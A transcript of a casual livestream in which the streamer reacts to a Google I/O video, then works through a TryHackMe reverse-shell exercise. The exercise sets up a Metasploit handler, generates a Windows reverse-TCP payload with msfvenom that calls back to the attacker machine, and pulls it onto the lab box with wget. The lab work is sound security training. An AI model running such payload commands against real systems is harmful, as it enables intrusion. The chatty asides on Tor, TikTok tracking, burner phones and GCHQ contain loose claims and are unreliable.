Tech Radar Pro declared that.
Howdy, everybody. Okay, let me just make sure you guys can hear me. Can you guys hear me? Can you give me a thumbs up if you can hear me? I want to make sure. Hopefully you can hear. Okay, I think you guys can hear me. That's good. That's good. Good. Okay. I was hearing my own echo, man. I hate it. Yo! Howdy, bro. My man is here. Wanch. What's up? How you doing, brother? So it takes me time to set up to make sure things are running fine. But I have something interesting today. I was thinking about it. I wanted to improve myself, right? So I was thinking about like an interesting way I can do something. And today I found an idea. I found a very interesting idea. Just give me one sec. But how's your day so far? A very good morning to you. Visit channel. Why I don't see myself live properly? I don't know why I can't see myself live on the app. I see it on the website, but not on the app. Okay, here it is. Okay, you can hear me, right? Awesome. Alrighty. So I have a couple of interesting things I wanted to show, right? Awesome. That's awesome. Have a great. It's awesome. It's good to have that positive mentality in the morning, buddy. So actually, I have something interesting. I wanted to add some AI knowledge to the streaming, right? Because AI is taking over everything, right? It's going to take over everything, including your medicines, including like basically every aspect of your life, right? Awesome. So what I wanted to do with the AI, I wanted to share a video which I really liked. Want to share. It's by Fireship.io. Then I have a punishment for myself. Where I wanted to learn how to not use mouse and use just keyboard. Just in case in future there are places where I can only use keyboard and no mouses. So I will be going over that. What will be my punishment? And we'll be using Tmux today. So with that being said, let me make this. And let's watch something amazing. Right? So this is a video by Fireship.io. And let me share the video link. Great guy. He's an amazing guy. Lovely videos by him. And I want to just get this pop out. Get this popped out. Oh, I can't use. Okay, my Google is not working fine. Okay, now it's working fine. Cool. Alrighty. So let's watch this video till everybody joins, and then we'll go over TryHackMe, right? Basically, we'll be completing majority of it. Task 10, task 11, and next steps. And practice an example depending on how much time we have left. We'll work on it, right? See what all is there. There is a bunch of questions, and then we will do some practice on the way. So hopefully that sounds good, but there will be 3 tasks for sure today. So with that being said, let's go over this Google I/O video. I want to really show you this.
Unleashed the most intense barrage of AI hype. Yesterday, Google unleashed the most intense barrage of AI hype bait, trust me bro, benchmarks, and paywalled vaporware the world has ever.
Let me change the speed. I watch 1.5 speed most of the videos.
Intense barrage of AI. Yesterday, Google unleashed the most intense barrage of AI hype bait, trust me bro, benchmarks, and paywalled vaporware the world has ever seen. And it was awesome. Gemini 2.5 DeepThink crushed all other reasoning models like O3, and even the cheap Gemini Flash model was able to beat off O3 from the top spot. In the Chrome browser, Gemini will soon have the ability to navigate and use websites for you. Meanwhile, this new tool called Stitch will automatically generate and design UIs, which means you're really screwed if you're a web designer. AI is going to be designing.
I am a web designer. I'm a front-end designer. So, or not designer, at least I'm a front-end engineer, so I'm kind of screwed.
Websites for AI agents to use in the AI-powered browser. Meanwhile, Jules is an async agentic coding agent that will code your AI agents, making coders obsolete yet again. I'm afraid of no man, but this new AI tool called Flow scares me. This thing could actually make low-effort, faceless edgelords on YouTube obsolete by generating entire cinematic adventures with AI. But that's just the tip of the slopberg. In today's video, we'll break down 11 game-changing things you need to know from Google I/O 2025. It is May 21st, 2025, and you're watching the Code Report. When I went to watch the keynote, I saw that they had turned off comments, and it's obvious this cowardly move is because they already knew what the top comment would be.
The Fireship bat signal has been lit. He can only save us now. We need Fireship to guide us through this content. Yo, Hartfield, what's up, brother? How you doing? We are watching Fireship I/O. That's true. I still search that sometimes.
And that's why we're going to talk comment 2025, and you're watching the Code Report. When I went to watch the keynote, I saw that they had turned off comments, and it's obvious this cowardly move is because they already knew what the top comment would be. And that's why we're going to talk about the worst thing first, Google's new AI Ultra payment plan. I'm already on my second mortgage to afford all my AI subscriptions, but now to get access to the full girth of Gemini's power, you need the new Google AI Ultra subscription, which is available at the low price of $124.99 per month for 3 months, then $249 a month after that. And if you buy right now, they'll also throw in 1 month free and an absurd 30 terabytes of storage for all your generated slop. But that might be worth it because Gemini is now the best across all LM arena categories. Not surprisingly, it completely crushed its own Trust Me Bro benchmarks, and the vibes are strong with this one. Gemini also managed to beat Pokemon on its own, but what might be more exciting is the release of Gemma 3N. Gemma models are open, so as a developer you can use them to make money for your own products, and the performance of this one is approaching Claude Sonnet 3.7. Now, as I mentioned before, Gemini is also going to be coming in your browser soon, and its new agent mode, formerly Project Mariner, will allow it to take actual actions on websites like click buttons, fill out forms, and automatically generate your opinion to post a comment to a Fireship video.
Comment powered by Gemini. Fireship, it's me, your only viewer. Over the years, I have created illusion that many people were watching you, but it was all me. Now I'll send this message for all my accounts. So basically, if you're going to use Gemini with your Google Chrome, you can do the same for my videos. Like, hey, I was the one always chatting in your chat. I'm an AI.
At the end of 2024, I told you that 2025 was the year of agents. OpenAI just launched the Codex agent, GitHub Copilot launched agent mode, and now Gemini has its own creatively named agent mode. And agents will be used in tools like Stitch and Jules to automatically generate UIs, code them, and interface with tools like Figma. The best news though is that Google supports the Model Context Protocol, which makes it much easier for developers to integrate this tech. That's surprising because Google would normally go off and invent its own architecture that nobody asked for, and then kill it a few years later. But one of the most impressive things at I/O is Project Astra. It takes a live video feed and uses low latency AI to describe the world around you. I've been using it to identify which mushrooms are edible in the wild, and it's actually pretty useful. We also found out that Android XR glasses are real, and eventually this technology will be integrated into them to compete with things like the Meta Smart Ray-Bans. But an even more futuristic announcement was Project Beam, a tool that takes 2D video and uses AI to transform it into a 3D experience. That'll make your daily stand-up meetings much more realistic, and I think it could be a game changer for one other industry that I can't mention in this video without being demonetized. In addition,
so basically, a bunch of OnlyFans models who are just like, or things, right? Images you can find on Google. Those videos can be generated. I love this thing, OnlyFans. It's amazing, man.
Form it into a 3D experience. That'll make your daily stand-up meetings much more realistic, and I think it could be a game changer for one other industry that I can't mention in this video without being demonetized. In addition, VO and Imagen, Google's video and image generators, also got huge upgrades. And what's crazy is that you can now generate video that also has sound.
And she commands your awe with every breaking light.
And this is all being put together in a new tool called Flow, which is targeted at Hollywood studios, and someday might be used to generate all the content that you binge on Netflix. And that brings us to the final thing you need to know, which is absolutely insane and crazy, and I can't even believe I'm saying this, but CSS has new primitives for building carousels. Instead of 10,000 lines of jQuery, you can now build something like this with just a few hundred lines of CSS. And once you've done that, you'll need a server to deploy it to, like Hostinger, the sponsor of today's video. Not only do they put anything for under 10 PUs and Coolify, freedom, and an awesome developer. I will see you in the next one.
So I was wanted to ask you this because when I was watching, I wanted to see this. We were talking about Sunday special, right? What do you think? Like, how interested would you guys be if I do Sunday special, but we are just playing around with these AI models or AI things, right? Even if I have to purchase, probably I'll purchase a month or two, and just generate things. Just see like if we can create a business together. Example would be, when AI came, right? The first thing, somebody used these storytelling, basically model in which he'll ask ChatGPT create a story, and some from a different model will ask for images. Pay PUBG. So no AI playing, just PUBG. Okay. I would actually love to download and play it sometimes. I won't mind. I think I can play. I don't know if in India you guys can play still. But yeah, like what I was saying, this guy went on Amazon, right? Created these storytelling books in which just self-published. All the information came from ChatGPT, images from different things, and it sold very well. It was a very good, lucrative business. So we can do that with Disney-like movies on a YouTube channel, just to play with this Gemini model. Oh, you play daily? Oh, I thought it was banned in India. PUBG. Oh yeah, VPN sounds good. Yeah, I was like wondering because I know PUBG was banned because it was sending a lot of information to China. You know, an interesting thing about how good these Chinese companies are. I'm probably putting myself in a very bad radar, but interestingly, if you think about TikTok, right? These, let's say if you want like YouTube or some other company not to see your data, right, or where your location is. So let's say if you're using YouTube right now, you don't want a company to show you ads of your own local, let's say Delhi or Mumbai or Chennai or anywhere in the world, New York, right? You open your VPN, try to change things, right? TikTok did a way different thing because other ones are looking at your internet. TikTok was looking at your SIM card information, so not even your internet. So here, TikTok. SIM card for location change. So if you actually, it doesn't matter if you were using VPN, TikTok was still able to give you very, very precise information about you. And that was like a bunch of things nobody noticed. Still, like these things were bought by security engineers through their research and everything. So that's why I'm like kind of scared, even by like with the Temu app, which is I see its ad everywhere in the world. I'm just kind of scared because it's still like affiliated with the China and all those. Like there are information about it, right? Even though the founder here, there are information about it. Links to the Chinese government sending information there. So just something interesting. Before you download an app, maybe you might want to do a research about it. But yeah, we can like play some games. I do play Fortnite or Marvel Rivals a lot. Yeah. If you use TikTok from Tor, right? Like because what these things does. Let me explain you how the game works, right? With the Tor, right? Versus any other. Let's say this is your VPN connection. And this is internet for blue. In a usual time, what you will do is, let's say this is your internet connection. You ask for a request, let's say Facebook. It goes to your ISP. ISP is Internet Service Provider. So for example, if you are in Canada, it will be Bell. If you are in India, it will be AT&T. In India, it will be Jio or Airtel, right? They go through your ISP, and then what VPN does is basically goes to the ISP, but this time it is encrypted. So let's go like this. This is encrypted. This will go to let's say a VPN server, gets unencrypted there, and then goes to internet, back. So your information kind of is shown as this one, whoever is the company here, for example, Facebook, right? Now, and Tor is basically this, but like multiple times through different computers that are using Tor. Let's say you connect to this one, then this, and here. Now, a lot of people think Tor is very like safe and all those stuff, but reality is, right, the Tor, this is the last node in Tor, I believe, and I think this is the right thing. Like if in the last node, whoever controls this last node controls your whole Tor connection. So if he wants to see your location, this person can. Just to give you information. And now what comes is the TikTok is like you are sending this information. Yes, you are sending this information. But what TikTok is doing is not looking at your internet. It's looking at something that your system has. Your SIM card, which doesn't change, right? Your SIM card information is also sent. So that also remains same. That goes with the information. Just like your username, password, or any other token. This is also going. So they can see this extra piece of information. Doesn't matter if you're using Tor or not. That's why there are something called burner phones. If you are using like apps like these, which you want to see, but you don't want them to track back to you, you want to use burner phones. With Tor, how the illegal things is going, because the TikTok thing you are asking, right? That uses those SIM card information, not every website. So for example, if you want to go on Amazon, they don't care about your SIM. They don't track. It's not allowed basically. So they won't be able to track your information. This information is not there in Amazon, and that's why they are not able to see the information about you. That's why a lot of people use Tor, because that still hides their information from internet, and they don't care about your SIM card information. They just care about your IP address, which will be this guy here. If you're going to, let's say, Silk Road, which is not there right now, or Alphabet, which is again a website, do not go. Even if it is online or some other type of websites. They look at IP information. They are websites. Application is a different thing. There is difference between an application and a internet connection type thing. Just a bit different, I guess. Does that make sense? Like, was that helpful? Do you get it? Yeah, and then burner phones. Burner phones are basically like type of phones you can just destroy. It's like use and throw. And you can buy a bunch of them. These type of phones. These are burner phones. You see how cheap they are? And if I want to see, let's say, burner phones in India, which are basically untraceable. That's what and they are available in India. That's not true at all. You can buy so many burner phones anywhere from Amazon and so many websites. In India, it's way more easier to find these burner phones than anything. Yeah, it's crazy. And I learned that actually it's funny because that's where I will say university. This was one thing I learned from university. Because my university, I was taking a data related course. And that person, we all had to do our own research on some topics and stuff. And this person was, the topic he took was TikTok ban. To see what all information there is. It's a lot of interesting things they have. So I just see it and I'm like, you know what? Kind of I'm happy TikTok was banned. It's not about the things, the reels, whatever the things people putting, the reels and all those content, but the information they are gathering from us. Even there is, if you want to know a bit more about how internet is tracked, GCHQ. GCHQ is a UK's FBI, if you want to know. And I believe they are like tracking at least 25% of the data on internet. Admits risking national security with their... No, thank you. I don't remember where I read it, but it was a long time ago where GCHQ was actually 25% of the world internet traffic was going through their satellites, and they were able to see. And that's what recently what happened with UK and Apple. Apple was basically saying what used to happen is Apple cannot see your data. Let's say if your phone, you are doing a criminal activity or whatever, your phone is found by FBI, they will go to Apple and say, hey, unlock this phone, we want to see. Apple will be like, no, we don't have any keys, we don't know what is going on, so we can't hack it. Now, what UK did recently, I think 2 months ago or 1 month ago, they said, hey, in every single iPhone in the world, create a backdoor key. That's backdoor key. So that, let's say if there is any phone that they want to see the information, the messages or anything, they should have access. This is the UK government. They talk about data privacy, humanity rights. They want to have access to your data in the whole world. Remember, the request was every iPhone in the world, they want to have access to, or they should be able to see the data inside. Now, what Apple said, no, that's against our privacy policy. UK, being the government, said, okay, we will take away Apple from UK. You won't be able to sell anything. So they came to a conclusion, and at the end of the day, all the iPhones, if you go to UK, I believe, not just buy, but if you go to UK, they will be able to see your data. So that's how much things go around in the world right now. So there's these news are like, and interestingly, these news are like very less promoted in different places. Like these WSJ, I have like 2 subscriptions on my phone. One is Financial Times, second is WSJ, which is Wall Street Journal. Very less information is about these. There is one article, but these sensationalized article about wars and all those things, those are like hundreds or thousands of those. So, and if you want to see how biased your phone is, how biased information you feel you might be getting information. Even I used to feel I'm getting a lot of good information. I'm seeing the reality of the world. Reality is, if you actually want to see how biased information you get on your YouTube, on your Instagram or anything, pick up your friend's phone who is legit opposite, right? If you are left, the person should be right wing, like leftist, liberal and democratic or conservative, whatever. Just pick somebody else's phone and see through their feed how information is fed to them. You will be blown away that's how much information you might be getting is different than the person, and why the behavior, there's such a big behavior difference between you and your friend. It's interesting, man, like how badly we are being fed the information by Facebook, Instagram, YouTube, every single company, because we did so search. It's crazy, because I won't say who I support, right? Let's say there is left, or let's say there is public one opinion, or opinion one, because I don't want to use the word left or right. There is opinion one and opinion two. Just change your phones. Do that for like 5 minutes. You will be like gone, because I am opinion one person. A friend of mine is opinion two, for example. I was blown away when the person said like, oh, what I'm looking at your phone, I never will get this information or these type of reels. And I was like, really? Saw his whole different world. My brain, like 2-3 days ago, my whole brain was like hanged almost. So yeah, that's it for today, I guess, in terms of these things. But interesting thing I want to talk about is that I will have a challenge for myself. And I want your guys' help, right, in this. Today, I will be, I want to just use my keyboard. I don't want to use my mouse if not needed. So every time I use my mouse, I will do one push-up at the end of the video. So I want you guys to keep a track of how many push-ups I have to do. Every time I use a mouse, you see the mouse moving, feel free to call me. Starting when we start our TryHackMe. Right now, I just want to post it first here. One mouse use equals 1 push-up punishment. How does that sound? Do you like that? I want to see here. No. It's so going to be consuming. I have to pin this because I don't know how to pin without mouse. Okay, sounds good. You agree? Okay, let's do it. Because I think once a lot of people I was looking at, they use like NeoVim and all those tools which don't use mouse. So that's interesting. And once we start TryHackMe, we can do this. For right now, I have to do this and this, so everybody can see what's going on. Okay, it's gonna be awesome. Let's do it, baby. Let's do it. And we will be using Tmux today. So my man is going. You be ready for it? Yeah, I am ready, man. I am ready. I was practicing Tmux today, so I feel like I'm ready. I hope so. I just have to start. Before doing this, I want to just start my TryHackMe machine, because I know I won't be able to use it. It will be kind of annoying if I don't, certain things I need access to. So as soon as I connect to my Linux, I won't touch anything. I won't be using mouse. But yeah, before I start, right? Task 10, task 11, task 12. Holy, is going to be a problem. Okay. And also Tmux today. Today is a Tmux day. No terminal or like any normal one. We'll use Tmux. Exit. Okay. You guys see this? Be ready. And I did some practicing. I did some things, Googling and stuff. So I feel like I'm in a good shape today. So we have 10, 9. Our IP is ready. Once IP is ready, I connect. I'm good to go. Okay, the IP is here. Let the game begin. Starts now. So first I'm going in Tmux. SSH shell let's see, and let me know if I have to increase the what's this called, the size, fonts or anything. Oh, I have to first connect to the OpenVPN. So L desktop sudo OpenVPN Kali. So you see this now, there is a whole different window open. It's fine, right? Okay, good. Thank you, boss. Now I have to remember how to open a new window. I believe it was like this. No. Control B. I hate it. I forgot the first command. Okay. It's for a new window. It is Control B or okay, Control B %. Okay, this is just for the new tab. So Tmux. No, I didn't use. No, gotcha count gonna. No. I didn't use my. Mouse. So I didn't use my mouse. No, that's not counted. Tmux. And that was Control B and the % symbol. Yeah, I just missed. I know. Bro, I need help, but in a different way. So how to use my brain cells here? Shell. First, I have to export IP equals this guy. Shell or SSH shell at $IP. Okay, yes, add to the SSH. Password will be try H4CKM3 and holy try hack. Come on. Okay, we got the shell. Okay, and one thing I looked specifically because I knew if I'm doing this challenge, I need this to be able to change windows without using my system. So, and I think it is this one is Shift Tab. No, to go for a new. Okay, Chrome tab. Navigation keywords, keyboard shortcut. One right. Okay, so Alt. No. F6. No. What is Alt plus Y? Between tabs. Okay. Control F, what you want to find. Control search, keyboards. Dude, I hate this. Okay. So this is left control with the tab. So I have to go here now. Okay, so I will be doing is tmux command for new window. I hate it. Control B and C. Okay, I think it's going to take a bit time. Yeah. Should I do it on Sunday because I think this is going to be a bit challenging. Okay, this one is here. Control C. Now, if I want to do actually something interesting. Oh, easily, yeah. But if you see, actually, I want to show you. If you see the bottom, in this one, I'm going to use. Should I use? So, okay, I have to use one, so I'll go for one. I'll take this L. But I want to show you guys this. You see on the left, I'm highlighting this area, this one. 0 is SSH and 1 is 0 is SSH, 1 is ZSH. So that those two are windows, right? I created one with Control B and then C. So that's one push up right there. And I forgot almost how to use this one. Okay, Control B and 0. So I have this shell. I will go exit in this one. Because I want to use 10.10.198 echo IP. Just want to make sure. 10.10.198.90.20. Sorry. So that will be fine. Again, Control B and then 1 to go to the first window. I'll go Control B %sign. Here I will do SSH shell 10.10.198.20. TryHackMe $. Okay, beautiful. And to do this, okay. Hey, I'm learning. Do you see it? I have one push-up only for now. Now let's go to our TryHackMe. Okay. So Metasploit multi-handler. We have so I have to use mouse for this, so it's okay, I guess. Second push-up. Multi-handler is a superb tool for catching reverse shells. It's essential if you want to use Meterpreter shells and is the go-to when using staged payloads. So if you remember yesterday, staged payloads is when we send only the first small packet to our target machine, right? So this is our attacker, right? Bro, a little story I heard somewhere. Wanna hear? Sure, I would love to. Till then, till you tell the story, right? Let's see. So this is our target, and this is our attack box, right? This is us. So in the attack box, we have this, like we send a first one, a small packet called stager. Basically, it's going to execute and create a tunnel for us in the attacker one. And our metasploit with the metapredator is going to send a whole reverse shell packets, or like a big packet, big executable, or whatever you want to say, right? Code, so that we can get a proper reverse shell, stable reverse shell into our system. So adjust my English when I'm telling my story. For sure, bro. I got you. I would love to hear. Yeah, man. And don't worry. Don't worry. Yeah, I told you my whole story. It took me 4 months to order something from to get a coffee, simple coffee. So don't worry. Don't be nervous. Okay. So multi-hand is a superb tool for catching reverse shells. It's essential if you want to use metapredator shells and is the go-to when using staged payloads. Unfortunately, it's relatively easy to use. When Metasploit with MSF console, open Metasploit with MSF console, type use multi-handler and press enter. Okay, let's hear this. Lads, first of all, 3 friends went to a shop for a coffee. Okay. I'm actually interested in this story, what's going to happen. And I'll make it big. I'll continue on this and let's read the story all together. Let's do that. So open Metasploit, use MSF console, and with the MSF console, use multi-handler and press enter. We are now primed to start multi-handler session. Let's take a look at the available options using the options command. Okay. So we have exploit multi-handler payload. We have to set up a payload, I believe. Generic shell reverse TCP. Then we have lhost and lport. There are 3 options we need to set. First, payload, because we need to, based on the system, we need to tell which exact payload. Then what is the IP address and the port for the target machine. These are all identical to the options we have set for generating shell code with MSF Venom, a payload specific to our target, as well as a listening address and port with which we will receive a shell. Note that the LOs must be specified here, as Metasploit will not listen on all network interfaces like Netcat or SOCAT will. It will be told a specific address to listen with when using TryHackMe. This will be your tunnel. Okay, so L1 is actually R, not, that's why I was confused. Left is us, not right. I'm bad with left, right. We set these options with the following commands. Set payload, sell lhost, sell. Okay, let's read what our boy here has said. First of all, there are 3 friends went to a shop for a coffee. The bill is 30 rupees. Okay, the shop owner is kind-hearted, so he gave 5 rupee discount. Before, the bill is 30, right? And the people also 3. So each one paid 10 rupees. Now 5 rupee discount. Yeah. Let's hear it. What happens now? I would love to hear this. Is going to be a big fight coming over from their side. That'll be interesting. I'm actually like very curious what's going to happen, because I know how boys think. I know how boys work. Okay. So the waiter takes back 5 rupees back to them. Okay, give 5 rupees back to them. The boys. Let's see. Okay. To be continued, lads. And the three people also kind-hearted. Okay, let's see. Okay, we'll continue that. So we should now first, let's see. We should now be ready to start to listen. Start the listener. Let's do this by using exploit-j command. I've never used that command. Huh. This tells Metasploit to launch the module running as a job in the background. Okay. Run this module. Okay, so run, but in the background, it's like we did with STTY, right? So now sudo msf console-q use multi. Okay, what is msf console-q? Okay, first turn off this and I accidentally closed TryHackMe. Okay, back to where we had. And let's see our Kali. MSF. Okay, one sec. F console-help. What is -q? -q is quiet. Do not print the banner. Oh, okay, nice. Interesting. I had no idea that was a thing. Okay, so what happens? This so the waiter gives them back 5 rupees and the three people also kind-hearted. So these people give the tip to the waiter 2 rupees and they take 3 rupees each, 3 rupees each, 1 rupee back, right? Now they logically paid 10 rupee and got 1 rupee back. Yeah. Yeah, kind of, yeah. Are you going to play with me with these words? I feel like it's one of those questions where this much money came from. Okay. I think everybody here is interested in this story right now. What happens next? So, but let's look at this. So we have our option now, wildcard here, this one. MSF console-q, so quiet. Do not print the banner, use multi-handler, yes. Options, we have these. So set payload Windows x64 shell, right, reverse shell. Then we do lhost, lport. Our host, lhost is the value of our attack machine with tunnel 0, whichever is that in IP address for that interface. Port, exploit-j, so running in the background. Okay. So let's run this in the shell. Sol-q and then sudo they asked. Okay. Come on. Why is taking time? MSF console-q. Okay, here it is. Use multi-handler. Okay, we have the exploit multi-handler done for us here. And let's hear now. Quickly first, we'll do is ifconfig. How to make this go like a little bit right? No. So what is tunnel 0 value? 10, 13, 86 and -9. So set also options first is set lhost, set L port, and the port will be basically let's say 4444 for us, keeping the convention. And we are going to use set or show payloads. Show payloads. So I want to see tmux. I want to see one thing, how to use tmux system. Okay, our boy here has completed his story. Okay, let's see. Now logically they paid 10 rupees and got 1 rupee back. So they paid 9 rupees each. So 3 people paid 9 rupees each is equal to 27, right? So 27 plus the tip they gave is equal to 29, right? Then where is 1 rupee missing? Okay, I knew as soon as he said this, I knew. Listen, bro, you can't play these word games with me. You know why? I took accounting during my university time. I just was like very interested in accounting for some reason. I took that course. So let's see what you are saying versus the reality. And it's always good to draw, and that's why I'd love to draw. Oh, hey Sigma, sorry, I just saw your message, buddy. So it's his one. Hey buddy, welcome to the family. So what I'm working on is what the shell TryHackMe room. Right now I'm at task 10, I believe. We'll be covering task 10, 11 and hopefully 12. Yeah, you messed with the wrong account and I will tell you why. And it's important, I will say this to everyone, even if you are in tech or anywhere, learn accounting a little bit and have a little bit idea of how the accounting works and how your standards work. Because money controls your life, right? Like money is not the most important thing in the world, but to get to the most important things in the world, like spending time with your family, with your loved ones, with your well-wishers and having a good health, money comes into play. Legit. That comes into play, right? So learn a little bit accounting because accounting is the language of money. So here, the reality. We'll make 2, left and right. Right? So you said is they gave $30 to the basically to the person, right? And got a $5 discount, right? Here, $30 gone. So this person has 0. Or actually easy for you guys, as I do my own way. So $30, right? They got $5 back. So $25 went to the basically owner. Now, $5. They gave $2 to waiter. And kept $3 to themselves. 3 with or one per person, right? And now what you are asking, always good to draw. What you are saying is 3 people paid 9 rupees each is equal to 27. Yes. So what you are saying is you are covering with your stuff here. You are saying they did this one. Yes. This is $27 each. And they gave 2 rupees tip. No. The tip is included in that. The tip was included in that $27. So this is your wordplay. I understand. And the question actually, if you wanted to play with me, better would be, so they gave $27 and $2 and they gave $2 in tips. So equal to 29. That would have been a good wordplay. I'll tell you. Where I do that too. Like I'm basically you. I love playing with people's brain. I love confusing them. Yeah, I know, buddy. I'm good with these things. I'm really good with these things because I'll tell you this. I watched like with money, right? You just need to know. Even though like take help from some accountant for my taxes because in Canada everybody or even in America or North America everybody gets accountant, which is like very cheap if you are just going once a year to them. What I do is I pay him like I get him a free coffee. I pay him his fee, right? But I also get him a free coffee, right? Whatever it costs me, like let's say something free coffee plus like let's say some bread or like a small sandwich, right? And during I take his 1 hour and I ask him all the questions about the taxes he did for me. Thanks, bro. Thank you so thank you so much. I really appreciate that. Thank you. I love you, man. Love you. Thank you. But yeah, and this is actually like a good lesson I can give you for future. I give him a free coffee sandwich. I get his 1 hour or 30 minutes as a respected one, right? And I ask him all the questions about okay, did you did this? And with Chat GPT, is such a good thing because I can ask Chat GPT, hey, I do this. I do my social media with YouTube and stuff. I made like let's say $20, $50 the whole year from ads. Because no donation. Let's say there is no donation, nothing, just $50 from my cash. How can I use that to save my taxes? What can I do? What can I do? I asked Chat GPT 20 questions. Then I go to my account and I try to understand. Hey, did you did these parts? Did you? I asking questions so you can tell me what next time I can do, what I can do next time, what I did this time, and how I can improve and save on taxes. So just take accounting, just some YouTube videos is great to learn. Okay, with that live session, I guess. Sorry, I keep on going in different directions, but I think like it's important to learn these things, and I want to share what I learned with my life. So here we are using now we were setting up our MSF console. We are using set payload Windows x64 shell reverse TCP, right? So we have Kali first of all. So I want to use set payload Windows x64. I believe that was the 64-bit one because the 32-bit or 86 instructions 32-bit system, right? That will be 86. And then we have reverse No. It's good. I like these questions, man. This is how live sessions are. Like, you ask a question, right? You want to, like, this is all live. That's the beautiful part about life and this live sessions. I mean, I like it. Keep doing that. No. You're good, buddy. So, reverse TCP. So, we have this payload, Windows x64 shell reverse TCP. Set this up. Now, if you see options, we have our payload setup here. We have our all the information which is required. So this is a process required, blah, blah, blah. Usually, I would do run or exploit, right? One of the two things. This time, what I will do is basically exploit -j because it exploits and put it in the background, which is a beautiful thing. Exploit running as a background job 0. Exploit completed. No session was created. Started TCP. Things are working fine. Now it's listening. What we have to do next is try to set up connection. You may notice in the above screenshot, Metasploit is listening on port 1024. Where? A port under 1024, sorry. Port under 1024 like 0 or 1 to 1024, which are high priority important ones. To do this, Metasploit must be run with sudo permissions. Oh, okay, nice. This is, I think, a good information for everyone. Let me post it. But you are good, bro. You are good. You are doing good. Don't worry. I love it when you ask these questions. It's important to ask these questions, honestly. So, if we, I don't think so. Then that's the reason mine won't work, because if I did on 4444, like 4 4s, 4444, that's why I don't need sudo. When the stage payload generated in the previous task is run, exploit receives the connection, sending the remainder of the payload and giving us a reversed shell. Oh, this is what we did yesterday. So now what another thing I can do is, this is what we are doing, but I want to send, if you see this one, right? Control B and this. If you see here, there is no shell code or any kind of netcat or any exploit is not there in this one, because this was recently started. What we have to do is create the payload from MSF Venom, right? MSF Venom -p Windows x64 shell executable shell.exe to run this. And this is the executable. So we need to run a Windows practice box. What about PUBG? We'll play PUBG too. We'll play PUBG 100%. I'll find a way. We can play 100% PUBG, man. Let's do it on Saturday, my Saturday. So your will be Sunday morning, if that's okay. Or just hit me up in Discord. For everyone, if they want to chat, right? We'll play. Right after Marvel Rivals. Yes, right after that. Yo, Bandit. Today. Oh, I want to snooze that. No more ads. So, Bandit, I am using the T-Mux. You have to notice that. I was like doing that. I was waiting for you to come. Let's do it, man. Then it'll be fun to play PUBG. Yes, I'm showing you. Give me 1 second, boss. So everyone, our Bandit, our big guy in the stream is back. So here we go, bro. Here we go. We got 2 sessions. In the first one, we have our OpenVPN running. Here in this one, we have this shell as well as this running. What I want to do right now is, actually this won't work. I need to run the Windows for this. And I'm trying to use I'm moving towards using less and less what's this called? Mouse. So hopefully soon I can go mouseless. No rats. So we'll paste this here. Okay, we have our Windows ready. Beautiful. We are just doing like some TryHackMe like Metasploit work, which is interesting. I love it. Okay. Sorry, I had some messages coming on myself. But Bandit, I want to hear one thing. You are proud of me for using this. Please say that. Please say that. Yeah, the OG is back. Yes. Ladies and gentlemen, we have. I made Bandit proud. This is going to stay. This is going to stay. The OG is back. 100%, man. You should bend it. Actually, we'll talk. I want to show you this. Something sent by Want regarding this. So we'll go over this. Basically, in this, he says there are 3 friends. They went to a coffee shop. The bill was 30 rupees. The shop owner said he was a good guy, so gave a $5 discount. Before the bill, it was 30. Now the people, everybody was paying 10 rupees each. Now with $5 discount, it is 25. So all the three people were also kind-hearted. They gave $2 to the waiter and got 3 rupees back. So 1 rupee per person, right? Or rupees, basically dollar, you can say. Now logically, they paid 10 rupees and got 1 rupee back. So they paid 9 rupees each. So every person paid basically 3 rupees, totals 27. So 27 plus tip 2 rupees is equal to 29. Where is the missing dollar? I want to hear your answer. It'll be fun. Okay, and let's go back here. I want to transfer. Okay, we have CMD. This is taking time. So we are going to open the command prompt in this. We have our command prompt. I have to change. I'll change the properties so it's easy. Oh yeah, 100%, bro. The OG is way smarter than me. NFTs. Not wrong. He's not wrong in one way. All the missing money going to NFTs. Taxes. Maybe taxes. $1 missing gone in taxes. What I was doing. I have to get the shell exe in this. What I can do is get wget for this. So first I have to do is Control B %sign. Oh, exit this one. Control B and no, wrong. Control B and quotes. Yes. Okay. Yeah. Okay. So we have this. Now I was supposed to start a Python server with shell.exe. So first I will go in the desktop. And this one you have shell.exe, which let me put it out. You guys see this? Shell.exe is there. And I need to actually hide myself for 2 seconds. So you see shell.exe is here, right? Hopefully I'm hidden. Yeah, I'm hidden. Okay, shell.exe is here. Now I have to start a Python server. Python 3 is, this is good. I know my IP address is this 10.13.86.9. What I want is use this guy. Or actually I want to use the PowerShell. I have to increase this guy. This PowerShell has wget, which I love. After I got to learn that Edward Snowden used, thanks to Bandit, after I got to learn Edward Snowden used wget to hack NSA or get all the information. So we have wget 10.13.86.9 and shell, or wait, port 8080 out file shell.exe. Did I get it? Let's see. Okay, shell.exe is here in this guy. Now we'll do the dirty. Shell.exe. Why? Shell.exe cannot execute. Okay. Or dir, sorry. Shell.exe is there. exe. Run is not a command. How do you run something? One way is double click it, basically. So go to this PC, local C drive, user, administrator, and shell.exe. Okay. So, what would be a good way? Run exe from command prompt. Okay. I'm trying to run an iterator. The iteration completes and the movement static closes. No. Start and the file, or just that should be work. Okay. Okay. I want to make it a bit up, actually. Okay, hopefully you guys can see this one better. So start shell.exe cannot execute the specified program. It's not properly set up. Okay, what I can do is then actually keep this running. I'll go on my bad, control B, and here I'll do control B quotes. So what I will do is create MSF Venom. Nope, not here. Going to be all the MSF Venom gone. Okay, all good. So I think Bandit, I would need your help in this. So we are going to use MSF Venom to create the shell. So MSF Venom. Then we talk about the payload -p. Payload would be same as this guy here. I think Windows x64 shell reverse underscore TCP. Out file or format will be exe. Out file will be shell2.exe. And then what am I missing here? L port, L host and L port. Let's see. L host and L port. Okay, good. L host would be 10 dot. I hate this when this happened. 10 dot 13.86.9 and L port will be 4444. Let's see. Give me something, boss. Saved as UTY. What's that? x64 reverse TCP port blah blah blah. What am I doing wrong then? MSF Venom -p Windows x64 shell reverse TCP. Okay, copy this. MSF Venom -P Windows x64 shell reverse TCP exe MSF Venom -P Windows x64 shell reverse TCP-F shell2.exe. Oh, -O, my bad. Thank you. Control B dash here. Oh, thanks, boss. Thanks, Bandit. -O. Okay, awesome. Thanks, bro. So now I'm going to move shell2.exe to desktop. Okay. Control B side command, and actually I'll go here. No. Okay. wget shell2.exe. shell2.exe, and we need to keep running our control B dash control B up J. It's listening, so that's beautiful. Oh, it will be here. The system cannot execute the specified program. Why? Why? Execute the specified program. So, like, tells the Metasploit to launch the listening module, right, and stay in the background. Yes, we are doing that. Is it because the port? No, the port number should be allowed, right? Oh, sorry, bro. I didn't notice the ad was going on. 